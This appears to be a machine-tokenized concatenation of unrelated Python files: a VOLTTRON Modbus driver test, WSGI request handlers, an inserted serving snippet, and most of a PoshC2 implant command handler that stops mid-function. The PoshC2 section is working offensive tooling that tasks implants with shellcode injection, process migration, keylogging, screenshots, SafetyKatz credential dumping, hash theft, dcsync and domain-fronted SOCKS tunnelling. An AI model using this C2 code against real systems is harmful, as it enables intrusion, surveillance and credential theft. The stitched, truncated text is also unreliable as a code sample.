REACTIVE POWER MAX. DEMAND IMPORT (kVAR)":52.0 "TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA)":51.0 "TOTAL REAL POWER MAX. DEMAND EXPORT (kW)":50.0 "TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR)":49.0 "TOTAL APPARENT POWER MAX. 
DEMAND EXPORT (kVA)":48.0 "PULSE COUNTER 1 (-)":47.0 "PULSE COUNTER 2 (-)":46.0 "ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh)":45.0 "ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh)":44.0 "ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh)":43.0 "ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh)":42.0 "ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh)":41.0 "ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh)":40.0 "ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh)":39.0 "ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh)":38.0 "ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh)":37.0 "ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh)":36.0 "ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh)":35.0 "ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh)":34.0 "ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh)":33.0 "ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh)":32.0 "ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh)":31.0 "ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh)":30.0 "ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh)":29.0 "ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh)":28.0 "ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh)":27.0 "ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh)":26.0 "ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh)":25.0 "ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh)":24.0 "ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh)":23.0 "ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh)":22.0 "REAL POWER PHASE A (kW)":21.0 "REAL POWER PHASE B (kW)":20.0 "REAL POWER PHASE C (kW)":19.0 "REACTIVE POWER PHASE A (kVAR)":18.0 "REACTIVE POWER PHASE B (kVAR)":17.0 "REACTIVE POWER PHASE C (kVAR)":16.0 "APPARENT POWER PHASE A (kVA)":15.0 "APPARENT POWER PHASE B (kVA)":14.0 "APPARENT POWER PHASE C (kVA)":13.0 "POWER FACTOR PHASE A (-)":12.0 "POWER FACTOR PHASE B (-)":11.0 "POWER FACTOR PHASE C (-)":10.0 "VOLTAGE PHASE A-B (V)":9.0 "VOLTAGE PHASE B-C (V)":8.0 "VOLTAGE PHASE A-C (V)":7.0 "VOLTAGE PHASE A-N (V)":6.0 "VOLTAGE PHASE B-N (V)":5.0 "VOLTAGE PHASE C-N (V)":4.0 "CURRENT PHASE A (A)":3.0 "CURRENT PHASE B (A)":2.0 "CURRENT PHASE C (A)":1.0}<line_sep>@pytest.fixture(scope="module")<def_stmt>agent request volttron_instance<block_start>""" Build PlatformDriverAgent, add modbus driver & csv configurations """<line_sep># Build platform driver agent md_agent=volttron_instance.build_agent(identity="test_md_agent")<line_sep>capabilities={'edit_config_store':{'identity':PLATFORM_DRIVER}}<line_sep>volttron_instance.add_capabilities(md_agent.core.publickey capabilities)<line_sep># Clean out platform driver configurations # wait for it to return before adding new config md_agent.vip.rpc.call('config.store' 'manage_delete_store' PLATFORM_DRIVER).get()<line_sep># Add driver configurations md_agent.vip.rpc.call('config.store' 'manage_store' PLATFORM_DRIVER 'devices/modbus_tk' jsonapi.dumps(DRIVER_CONFIG) config_type='json')<line_sep># Add csv configurations md_agent.vip.rpc.call('config.store' 'manage_store' PLATFORM_DRIVER 'modbus_tk.csv' REGISTRY_CONFIG_STRING config_type='csv')<line_sep>md_agent.vip.rpc.call('config.store' 'manage_store' PLATFORM_DRIVER 'modbus_tk_map.csv' REGISTER_MAP config_type='csv')<line_sep>platform_uuid=volttron_instance.install_agent(agent_dir=get_services_core("PlatformDriverAgent") config_file={} start=<true>)<line_sep>gevent.sleep(10)# wait for the agent to start and start the devices <def_stmt>stop <block_start>""" Stop platform driver agent 
"""<line_sep>volttron_instance.stop_agent(platform_uuid)<line_sep>md_agent.core.stop()<block_end>request.addfinalizer(stop)<line_sep><return>md_agent<block_end>@pytest.fixture(scope='class')<def_stmt>modbus_server request<block_start>modbus_client=Catalog()['battery_meter'].get_class()<line_sep>server_process=Server(address=IP port=PORT)<line_sep>server_process.define_slave(1 modbus_client unsigned=<false>)<line_sep>server_process.start()<line_sep>time.sleep(1)<line_sep><yield>server_process<line_sep>time.sleep(1)<line_sep>server_process.stop()<block_end>@pytest.mark.usefixtures("modbus_server")<class_stmt>TestModbusTKDriver<block_start>""" Regression tests for the modbus_tk driver interface. """<def_stmt>get_point self agent device_name point_name<block_start>""" Issue a get_point RPC call for the named point and return the result. @param agent: The test Agent. @param device_name: The driver name, by default: 'devices/device_name'. @param point_name: The name of the point to query. @return: The actual reading value of the point name from the RPC call. """<line_sep><return>agent.vip.rpc.call(PLATFORM_DRIVER 'get_point' device_name point_name).get(timeout=10)<block_end><def_stmt>set_point self agent device_name point_name point_value<block_start>""" Issue a set_point RPC call for the named point and value, and return the result. @param agent: The test Agent. @param device_name: The driver name, by default: 'devices/device_name'. @param point_name: The name of the point to query. @param point_value: The value to set on the point. @return:The actual reading value of the point name from the RPC call. """<line_sep><return>agent.vip.rpc.call(PLATFORM_DRIVER 'set_point' device_name point_name point_value).get(timeout=10)<block_end><def_stmt>scrape_all self agent device_name<block_start>""" Issue a get_point RPC call for the device and return the result. @param agent: The test Agent. @param device_name: The driver name, by default: 'devices/device_name'. @return: The dictionary mapping point names to their actual values from the RPC call. """<line_sep><return>agent.vip.rpc.call(PLATFORM_DRIVER 'scrape_all' device_name).get(timeout=10)<block_end><def_stmt>test_scrape_all self agent<block_start><for_stmt>key registers_dict.keys()<block_start>self.set_point(agent 'modbus_tk' key registers_dict[key])<assert_stmt>self.get_point(agent 'modbus_tk' key)<eq>registers_dict[key]<block_end><assert_stmt>type(self.scrape_all(agent 'modbus_tk'))<is>dict<block_end><block_end>
<def_stmt>response_handler environ start_response<block_start>"""The WSGI Application Server. Arguments: environ {dict} -- The WSGI environ dictionary start_response {WSGI callable} Returns: WSGI Response """<import_from_stmt>wsgi application<line_sep>application.bind("environ" environ)<line_sep>"""Add Environ To Service Container Add the environ to the service container. The environ is generated by the WSGI server above and used by a service provider to manipulate the incoming requests """<line_sep># """Execute All Service Providers That Require The WSGI Server # Run all service provider boot methods if the wsgi attribute is true. # """ <try_stmt><block_start><for_stmt>provider application.get_providers()<block_start>application.resolve(provider.boot)<block_end><block_end><except_stmt>Exception<as>e<block_start>application.make("exception_handler").handle(e)<block_end>"""We Are Ready For Launch If we have a solid response and not redirecting then we need to return a 200 status code along with the data. If we don't, then we'll have to return a 302 redirection to wherever the user would like to go next. """<line_sep>_,response=application.make("request") application.make("response")<line_sep>start_response(response.get_status_code() response.get_headers()+response.cookie_jar.render_response() )<line_sep>"""Final Step This will take the data variable from the Service Container and return it to the WSGI server. """<line_sep><return>iter([response.get_response_content()])<block_end><def_stmt>testcase_handler application environ start_response exception_handling=<true><block_start>"""The WSGI Application Server. Arguments: environ {dict} -- The WSGI environ dictionary start_response {WSGI callable} Returns: WSGI Response """<import_from_stmt>wsgi application<line_sep>application.bind("environ" environ)<line_sep>"""Add Environ To Service Container Add the environ to the service container. The environ is generated by the WSGI server above and used by a service provider to manipulate the incoming requests """<line_sep># """Execute All Service Providers That Require The WSGI Server # Run all service provider boot methods if the wsgi attribute is true. # """ <try_stmt><block_start><for_stmt>provider application.get_providers()<block_start>application.resolve(provider.boot)<block_end><block_end><except_stmt>Exception<as>e<block_start><if_stmt><not>exception_handling<block_start><raise>e<block_end>application.make("exception_handler").handle(e)<block_end>"""We Are Ready For Launch If we have a solid response and not redirecting then we need to return a 200 status code along with the data. If we don't, then we'll have to return a 302 redirection to wherever the user would like to go next. """<line_sep>request,response=application.make("request") application.make("response")<line_sep>start_response(response.get_status_code() response.get_headers()+response.cookie_jar.render_response() )<line_sep>"""Final Step This will take the data variable from the Service Container and return it to the WSGI server. """<line_sep><return>(request response)<block_end>
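# --- Illustrative sketch added by the editor; not part of the handlers above. ---
# response_handler is a plain WSGI callable, so any WSGI server can host it. The
# snippet below uses only the standard library's wsgiref server; in practice the
# framework is usually served by a production WSGI server (e.g. gunicorn), and the
# "wsgi" module imported inside the handler must be importable for it to run.
from wsgiref.simple_server import make_server

def serve(app, host="127.0.0.1", port=8000):
    """Host a WSGI application callable on the given address."""
    with make_server(host, port, app) as httpd:
        print(f"Serving on http://{host}:{port}")
        httpd.serve_forever()

# Example usage (assuming the module above is importable under a hypothetical name):
#   from wsgi_handlers import response_handler
#   serve(response_handler)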
<import_stmt>base64 re traceback os string subprocess<import_from_stmt>prompt_toolkit PromptSession<import_from_stmt>prompt_toolkit.history FileHistory<import_from_stmt>prompt_toolkit.auto_suggest AutoSuggestFromHistory<import_from_stmt>prompt_toolkit.styles Style<import_from_stmt>poshc2.client.Alias cs_alias cs_replace<import_from_stmt>poshc2.Colours Colours<import_from_stmt>poshc2.server.AutoLoads check_module_loaded run_autoloads_sharp<import_from_stmt>poshc2.client.Help sharp_help allhelp<import_from_stmt>poshc2.server.Config PoshInstallDirectory PoshProjectDirectory SocksHost PayloadsDirectory ModulesDirectory<import_from_stmt>poshc2.server.Config PayloadCommsHost DomainFrontHeader UserAgent PBindPipeName PBindSecret FCommFileName<import_from_stmt>poshc2.Utils argp load_file gen_key get_first_url get_first_dfheader<import_from_stmt>poshc2.server.Core print_bad print_good<import_from_stmt>poshc2.client.cli.CommandPromptCompleter FilePathCompleter<import_from_stmt>poshc2.server.payloads.Payloads Payloads<import_from_stmt>poshc2.server.PowerStatus getpowerstatus<import_from_stmt>poshc2.server.database.DB hide_implant new_task kill_implant get_implantdetails get_sharpurls get_baseenckey get_powerstatusbyrandomuri<import_from_stmt>poshc2.server.database.DB select_item update_label get_allurls get_c2server_all get_newimplanturl new_urldetails<def_stmt>handle_sharp_command command user randomuri implant_id# alias mapping <block_start><for_stmt>alias cs_alias<block_start><if_stmt>alias[0]<eq>command[:len(command.rstrip())]<block_start>command=alias[1]<block_end><block_end># alias replace <for_stmt>alias cs_replace<block_start><if_stmt>command.startswith(alias[0])<block_start>command=command.replace(alias[0] alias[1])<block_end><block_end>original_command=command<line_sep>command=command.strip()<line_sep>run_autoloads_sharp(command randomuri user)<if_stmt>command.startswith("searchhelp")<block_start>do_searchhelp(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("searchallhelp")<block_start>do_searchallhelp(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("searchhistory")<block_start>do_searchhistory(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("upload-file")<block_start>do_upload_file(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("inject-shellcode")<block_start>do_inject_shellcode(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("migrate")<block_start>do_migrate(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"kill-process"<block_start>do_kill_process(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"kill-implant"<or>command<eq>"exit"<block_start>do_kill_implant(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("sharpsocks")<block_start>do_sharpsocks(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("stop-keystrokes"))<block_start>do_stop_keystrokes(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("start-keystrokes"))<block_start>do_start_keystrokes(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("get-keystrokes"))<block_start>do_get_keystrokes(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("get-screenshotmulti"))<block_start>do_get_screenshotmulti(user command 
randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("get-screenshot")<block_start>do_get_screenshot(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"getpowerstatus"<block_start>do_get_powerstatus(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"stoppowerstatus"<block_start>do_stoppowerstatus(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("run-exe SharpWMI.Program")<and>"execute"<in>command<and>"payload"<not><in>command<block_start>do_sharpwmi_execute(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("get-hash"))<block_start>do_get_hash(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("enable-rotation"))<block_start>do_rotation(user command randomuri)<line_sep><return><block_end><elif_stmt>(command.startswith("safetykatz"))<block_start>do_safetykatz(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("loadmoduleforce")<block_start>do_loadmoduleforce(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("loadmodule")<block_start>do_loadmodule(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("listmodules")<block_start>do_listmodules(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("modulesloaded")<block_start>do_modulesloaded(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("pbind-connect")<block_start>do_pbind_start(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("fcomm-connect")<block_start>do_fcomm_start(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("dynamic-code")<block_start>do_dynamic_code(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("startdaisy")<block_start>do_startdaisy(user command randomuri)<line_sep><return><block_end><elif_stmt>command.startswith("dcsync")<block_start>do_dcsync(user command randomuri)<line_sep><return><block_end><elif_stmt>command<eq>"help"<block_start>do_help(user command randomuri)<line_sep><return><block_end><else_stmt><block_start><if_stmt>command<block_start>do_shell(user original_command randomuri)<block_end><return><block_end><block_end><def_stmt>do_searchhelp user command randomuri<block_start>searchterm=(command).replace("searchhelp " "")<line_sep>helpful=sharp_help.split('\n')<for_stmt>line helpful<block_start><if_stmt>searchterm<in>line.lower()<block_start>print(Colours.GREEN+line)<block_end><block_end><block_end><def_stmt>do_searchallhelp user command randomuri<block_start>searchterm=(command).replace("searchallhelp " "")<for_stmt>line allhelp<block_start><if_stmt>searchterm<in>line.lower()<block_start>print(Colours.GREEN+line)<block_end><block_end><block_end><def_stmt>do_searchhistory user command randomuri<block_start>searchterm=(command).replace("searchhistory " "")<with_stmt>open('%s/.implant-history'%PoshProjectDirectory)<as>hisfile<block_start><for_stmt>line hisfile<block_start><if_stmt>searchterm<in>line.lower()<block_start>print(Colours.GREEN+line.replace("+" ""))<block_end><block_end><block_end><block_end><def_stmt>do_upload_file user command randomuri# TODO lots of common code <block_start>source=""<line_sep>destination=""<if_stmt>command<eq>"upload-file"<block_start>style=Style.from_dict({'':'#80d130' })<line_sep>session=PromptSession(history=FileHistory('%s/.upload-history'%PoshProjectDirectory) 
auto_suggest=AutoSuggestFromHistory() style=style)<try_stmt><block_start>source=session.prompt("Location file to upload: " completer=FilePathCompleter(PayloadsDirectory glob="*"))<line_sep>source=PayloadsDirectory+source<block_end><except_stmt>KeyboardInterrupt<block_start><return><block_end><while_stmt><not>os.path.isfile(source)<block_start>print("File does not exist: %s"%source)<line_sep>source=session.prompt("Location file to upload: " completer=FilePathCompleter(PayloadsDirectory glob="*"))<line_sep>source=PayloadsDirectory+source<block_end>destination=session.prompt("Location to upload to: ")<block_end><else_stmt><block_start>args=argp(command)<line_sep>source=args.source<line_sep>destination=args.destination<block_end><try_stmt><block_start>destination=destination.replace("\\" "\\\\")<line_sep>print("")<line_sep>print("Uploading %s to %s"%(source destination))<line_sep>uploadcommand=f"upload-file {source} {destination}"<line_sep>new_task(uploadcommand user randomuri)<block_end><except_stmt>Exception<as>e<block_start>print("Error with source file: %s"%e)<line_sep>traceback.print_exc()<block_end><block_end><def_stmt>do_inject_shellcode user command randomuri<block_start>params=re.compile("inject-shellcode" re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>style=Style.from_dict({'':'#80d130' })<line_sep>session=PromptSession(history=FileHistory('%s/.shellcode-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<try_stmt><block_start>path=session.prompt("Location of shellcode file: " completer=FilePathCompleter(PayloadsDirectory glob="*.bin"))<line_sep>path=PayloadsDirectory+path<block_end><except_stmt>KeyboardInterrupt<block_start><return><block_end><try_stmt><block_start>shellcodefile=load_file(path)<if_stmt>shellcodefile<is><not><none><block_start>new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s"%(base64.b64encode(shellcodefile).decode("utf-8") params os.path.basename(path)) user randomuri)<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Error loading file: %s"%e)<block_end><block_end><def_stmt>do_migrate user command randomuri<block_start>params=re.compile("migrate" re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>implant=get_implantdetails(randomuri)<line_sep>implant_arch=implant.Arch<line_sep>implant_comms=implant.Pivot<if_stmt>implant_arch<eq>"AMD64"<block_start>arch="64"<block_end><else_stmt><block_start>arch="86"<block_end><if_stmt>implant_comms<eq>"C#"<block_start>path="%sSharp_v4_x%s_Shellcode.bin"%(PayloadsDirectory arch)<line_sep>shellcodefile=load_file(path)<block_end><elif_stmt>"Daisy"<in>implant_comms<block_start>daisyname=input("Name required: ")<line_sep>path="%s%sSharp_v4_x%s_Shellcode.bin"%(PayloadsDirectory daisyname arch)<line_sep>shellcodefile=load_file(path)<block_end><elif_stmt>"Proxy"<in>implant_comms<block_start>path="%sProxySharp_v4_x%s_Shellcode.bin"%(PayloadsDirectory arch)<line_sep>shellcodefile=load_file(path)<block_end>new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s"%(base64.b64encode(shellcodefile).decode("utf-8") params os.path.basename(path)) user randomuri)<block_end><def_stmt>do_kill_process user command randomuri<block_start>impid=get_implantdetails(randomuri)<line_sep>print_bad("**OPSEC Warning** - kill-process will terminate the entire process, if you want to kill the thread only use kill-implant")<line_sep>ri=input("Are you sure you want to terminate the implant ID %s? 
(Y/n) "%impid.ImplantID)<if_stmt>ri.lower()<eq>"n"<block_start>print("Implant not terminated")<block_end><if_stmt>ri<eq>""<or>ri.lower()<eq>"y"<block_start>pid=impid.PID<line_sep>new_task("kill-process %s"%(pid) user randomuri)<line_sep>kill_implant(randomuri)<block_end><block_end><def_stmt>do_kill_implant user command randomuri<block_start>impid=get_implantdetails(randomuri)<line_sep>print_bad("**OPSEC Warning** - kill-implant terminates the current threat not the entire process, if you want to kill the process use kill-process")<line_sep>ri=input("Are you sure you want to terminate the implant ID %s? (Y/n) "%impid.ImplantID)<if_stmt>ri.lower()<eq>"n"<block_start>print("Implant not terminated")<block_end><if_stmt>ri<eq>""<or>ri.lower()<eq>"y"<block_start>pid=impid.PID<line_sep>new_task("exit" user randomuri)<line_sep>kill_implant(randomuri)<block_end><block_end><def_stmt>do_exit user command randomuri<block_start><return>do_kill_implant(user command randomuri)<block_end><def_stmt>do_sharpsocks user command randomuri<block_start>style=Style.from_dict({'':'#80d130' })<import_from_stmt>random choice<line_sep>channel="".join(choice(string.ascii_letters)<for>_ range(25))<line_sep>sharp_key=gen_key().decode("utf-8")<line_sep>default_sharp_urls=get_sharpurls()<line_sep>urls_prompt=PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.comma-separated-urls-history') auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>socks_proxy_urls=urls_prompt.prompt(f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ' '')}: ")<if_stmt><not>socks_proxy_urls<block_start>socks_proxy_urls=default_sharp_urls<block_end>socks_proxy_urls=socks_proxy_urls.split(",")<if_stmt>len(socks_proxy_urls)<l>2<block_start>print("Please specify at least two URIs")<line_sep><return><block_end>socks_proxy_urls=[i.replace("\"" "").strip()<for>i socks_proxy_urls]<line_sep>socks_proxy_urls=[(i[1:]<if>i.startswith("/")<else>i)<for>i socks_proxy_urls]<line_sep>default_sharp_url=select_item("PayloadCommsHost" "C2Server").replace('"' '').split(',')[0]<line_sep>domains_prompt=PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.protocol-and-domain-history') auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>sharp_url=domains_prompt.prompt(f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: ")<if_stmt><not>sharp_url<block_start>sharp_url=default_sharp_url<block_end><if_stmt><not>sharp_url.startswith("http")<block_start>print("Please specify a protocol (http/https)")<line_sep><return><block_end>default_host_header=get_first_dfheader(select_item("DomainFrontHeader" "C2Server"))<line_sep>host_headers_prompt=PromptSession(history=FileHistory('%s/.host-headers-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>host_header=host_headers_prompt.prompt(f"What host header should used? Default is {default_host_header}: ")<if_stmt><not>host_header<block_start>host_header=default_host_header<block_end>default_user_agent=select_item("UserAgent" "C2Server")<line_sep>user_agent_prompt=PromptSession(history=FileHistory('%s/.user-agents-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>user_agent=user_agent_prompt.prompt(f"What user agent? 
Default is \"{default_user_agent}\": ")<if_stmt><not>user_agent<block_start>user_agent=default_user_agent<block_end>default_beacon="200"<line_sep>beacon_prompt=PromptSession(history=FileHistory('%s/.beacon-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<line_sep>beacon=beacon_prompt.prompt(f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: ")<if_stmt><not>beacon<block_start>beacon=default_beacon<block_end><if_stmt>beacon.strip().endswith("ms")<block_start>beacon=beacon.replace("ms" "").strip()<block_end>server_command=f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"<if_stmt>" -v"<in>command<or>" --verbose"<in>command<block_start>server_command<augadd>" --verbose"<block_end>server_command<augadd>"\n"<line_sep>print(Colours.GREEN+"\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n")<line_sep>print(server_command)<line_sep>task=f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\""<if_stmt>host_header<block_start>task<augadd>f" -df {host_header}"<block_end>extra_args=command.replace("sharpsocks " "").strip()<if_stmt>extra_args<block_start>task<augadd>" "+extra_args<block_end>confirm=input("Are you ready to start the SharpSocks in the implant? (Y/n) ")<if_stmt>confirm<eq>""<or>confirm.lower()<eq>"y"<block_start>new_task(task user randomuri)<block_end><else_stmt><block_start>print("Aborted...")<line_sep><return><block_end>print("SharpSocks task issued, to stop SharpSocks run stopsocks")<block_end><def_stmt>do_stop_keystrokes user command randomuri<block_start>new_task("run-exe Logger.KeyStrokesClass Logger %s"%command user randomuri)<line_sep>update_label("" randomuri)<block_end><def_stmt>do_start_keystrokes user command randomuri<block_start>check_module_loaded("Logger.exe" randomuri user)<line_sep>new_task("run-exe Logger.KeyStrokesClass Logger %s"%command user randomuri)<line_sep>update_label("KEYLOG" randomuri)<block_end><def_stmt>do_get_keystrokes user command randomuri<block_start>new_task("run-exe Logger.KeyStrokesClass Logger %s"%command user randomuri)<block_end><def_stmt>do_get_screenshotmulti user command randomuri<block_start>pwrStatus=get_powerstatusbyrandomuri(randomuri)<if_stmt>(pwrStatus<is><not><none><and>pwrStatus[7])<block_start>ri=input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")<if_stmt>ri.lower()<eq>"n"<or>ri.lower()<eq>""<block_start><return><block_end><block_end>new_task(command user randomuri)<line_sep>update_label("SCREENSHOT" randomuri)<block_end><def_stmt>do_get_screenshot user command randomuri<block_start>pwrStatus=get_powerstatusbyrandomuri(randomuri)<if_stmt>(pwrStatus<is><not><none><and>pwrStatus[7])<block_start>ri=input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? 
(y/N) ")<if_stmt>ri.lower()<eq>"n"<or>ri.lower()<eq>""<block_start><return><block_end><block_end>new_task(command user randomuri)<block_end><def_stmt>do_get_powerstatus user command randomuri<block_start>getpowerstatus(randomuri)<line_sep>new_task("run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult " user randomuri)<block_end><def_stmt>do_stoppowerstatus user command randomuri<block_start>new_task(command user randomuri)<line_sep>update_label("" randomuri)<block_end><def_stmt>do_get_hash user command randomuri<block_start>check_module_loaded("InternalMonologue.exe" randomuri user)<line_sep>new_task("run-exe InternalMonologue.Program InternalMonologue" user randomuri)<block_end><def_stmt>do_safetykatz user command randomuri<block_start>new_task("run-exe SafetyKatz.Program %s"%command user randomuri)<block_end><def_stmt>do_loadmoduleforce user command randomuri<block_start>params=re.compile("loadmoduleforce " re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>check_module_loaded(params randomuri user force=<true>)<block_end><def_stmt>do_loadmodule user command randomuri<block_start>params=re.compile("loadmodule " re.IGNORECASE)<line_sep>params=params.sub("" command)<line_sep>check_module_loaded(params randomuri user)<block_end><def_stmt>do_listmodules user command randomuri<block_start>modules=os.listdir(ModulesDirectory)<line_sep>modules=sorted(modules key=<lambda>s:s.lower())<line_sep>print("")<line_sep>print("[+] Available modules:")<line_sep>print("")<for_stmt>mod modules<block_start><if_stmt>(".exe"<in>mod)<or>(".dll"<in>mod)<block_start>print(mod)<block_end><block_end><block_end><def_stmt>do_modulesloaded user command randomuri<block_start>implant_details=get_implantdetails(randomuri)<line_sep>print(implant_details.ModsLoaded)<line_sep>new_task("listmodules" user randomuri)<block_end><def_stmt>do_help user command randomuri<block_start>print(sharp_help)<block_end><def_stmt>do_shell user command randomuri<block_start>new_task(command user randomuri)<block_end><def_stmt>do_rotation user command randomuri<block_start>domain=input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")<line_sep>domainfront=input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")<line_sep>new_task("dfupdate %s"%domainfront user randomuri)<line_sep>new_task("rotate %s"%domain user randomuri)<block_end><def_stmt>do_sharpwmi_execute user command randomuri<block_start>style=Style.from_dict({'':'#80d130'})<line_sep>session=PromptSession(history=FileHistory('%s/.shellcode-history'%PoshProjectDirectory) auto_suggest=AutoSuggestFromHistory() style=style)<try_stmt><block_start>path=session.prompt("Location of base64 vbs/js file: " completer=FilePathCompleter(PayloadsDirectory glob="*.b64"))<line_sep>path=PayloadsDirectory+path<block_end><except_stmt>KeyboardInterrupt<block_start><return><block_end><if_stmt>os.path.isfile(path)<block_start><with_stmt>open(path "r")<as>p<block_start>payload=p.read()<block_end>new_task("%s payload=%s"%(command payload) user randomuri)<block_end><else_stmt><block_start>print_bad("Could not find file")<block_end><block_end><def_stmt>do_pbind_start user command randomuri<block_start>key=get_baseenckey()<if_stmt>len(command.split())<eq>2# 'pbind-connect <hostname>' is two args <block_start>command=f"{command} {PBindPipeName} {PBindSecret} {key}"<block_end><elif_stmt>len(command.split())<eq>4# if the pipe name and secret are already present just add the key 
<block_start>command=f"{command} {key}"<block_end><else_stmt><block_start>print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")<line_sep><return><block_end>new_task(command user randomuri)<block_end><def_stmt>do_fcomm_start user command randomuri<block_start>key=get_baseenckey()<if_stmt>len(command.split())<eq>1# 'fcomm-connect' is one args <block_start>command=f"{command} {FCommFileName} {key}"<block_end><elif_stmt>len(command.split())<eq>2# if the file name is already there then just add the key <block_start>command=f"{command} {key}"<block_end><else_stmt><block_start>print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")<line_sep><return><block_end>new_task(command user randomuri)<block_end><def_stmt>do_dynamic_code user command randomuri<block_start>compile_command="mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4"%(PayloadsDirectory PayloadsDirectory)<try_stmt><block_start>subprocess.check_output(compile_command shell=<true>)<block_end><except_stmt>subprocess.CalledProcessError<block_start><return><block_end>command=command.replace("dynamic-code" "").strip()<line_sep>check_module_loaded(f"{PayloadsDirectory}PoshC2DynamicCode.exe" randomuri user force=<true>)<line_sep>new_task(f"run-exe PoshC2DynamicCode.Program PoshC2DynamicCode {command}" user randomuri)<block_end><def_stmt>do_startdaisy user command randomuri<block_start>check_module_loaded("daisy.dll" randomuri user)<line_sep>elevated=input(Colours.GREEN+"Are you elevated? Y/n "+Colours.END)<line_sep>domain_front=""<line_sep>proxy_user=""<line_sep>proxy_pass=""<line_sep>proxy_url=""<line_sep>cred_expiry=""<if_stmt>elevated.lower()<eq>"n"<block_start>cont=input(Colours.RED+"Daisy from an unelevated context can only bind to localhost, continue? y/N "+Colours.END)<if_stmt>cont.lower()<eq>"n"<or>cont<eq>""<block_start><return><block_end>bind_ip="localhost"<block_end><else_stmt><block_start>bind_ip=input(Colours.GREEN+"Bind IP on the daisy host: "+Colours.END)<block_end>bind_port=input(Colours.GREEN+"Bind Port on the daisy host: "+Colours.END)<line_sep>firstdaisy=input(Colours.GREEN+"Is this the first daisy in the chain? Y/n? 